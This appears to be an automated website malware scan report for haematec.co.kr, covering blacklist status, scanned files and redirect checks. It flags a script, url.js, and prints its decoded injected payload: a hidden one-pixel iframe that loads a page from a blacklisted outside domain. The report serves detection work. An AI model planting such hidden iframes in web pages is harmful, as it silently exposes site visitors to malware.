Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=haematec.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://haematec.co.kr/ | 200 OK Content-Length: 5788 Content-Type: text/html | clean |
https://cdn.adf.ly/js/entry.js | 200 OK Content-Length: 2813 Content-Type: application/x-javascript | clean |
http://haematec.co.kr/korean/images/flash/url.js | 200 OK Content-Length: 3510 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: oldcake.co.kr function FlashMainbody(Ftrans,wid,hei) {
mainbody = "<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0' width='"+ wid +"' height='"+ hei +"'>"; mainbody += "<param name='movie' value='"+ Ftrans +"'>"; mainbody += "<param name='quality' value='high'>"; mainbody += "<param name='wmode' value='transparent' ...[3025 bytes skipped]... Decoded script: <iframe src='http://oldcake.co.kr/Flash/Sound/view.html' width='60' height='1' frameborder='0'></iframe> | ||
http://haematec.co.kr/korean/main/index.asp | 404 Not Found Content-Length: 1446 Content-Type: text/html | clean |
http://haematec.co.kr//www.google.com/ | 404 Not Found Content-Length: 1440 Content-Type: text/html | clean |
http://haematec.co.kr/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://haematec.co.kr/english/main/index.asp | 404 Not Found Content-Length: 1447 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: haematec.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 28 Jan 2015 02:19:35 GMT
Server: Microsoft-IIS/6.0
Content-Length: 5788
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCQDRDRS=GCDLJCAANEOGNJPAJBOGFEGC; path=/
X-Powered-By: ASP.NET
...5788 bytes of data.
GET / HTTP/1.1
Host: haematec.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 28 Jan 2015 02:19:35 GMT
Server: Microsoft-IIS/6.0
Content-Length: 5788
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCQDRDRS=GCDLJCAANEOGNJPAJBOGFEGC; path=/
X-Powered-By: ASP.NET
...5788 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: haematec.co.kr
Referer: http://www.google.com/search?q=haematec.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: haematec.co.kr
Referer: http://www.google.com/search?q=haematec.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.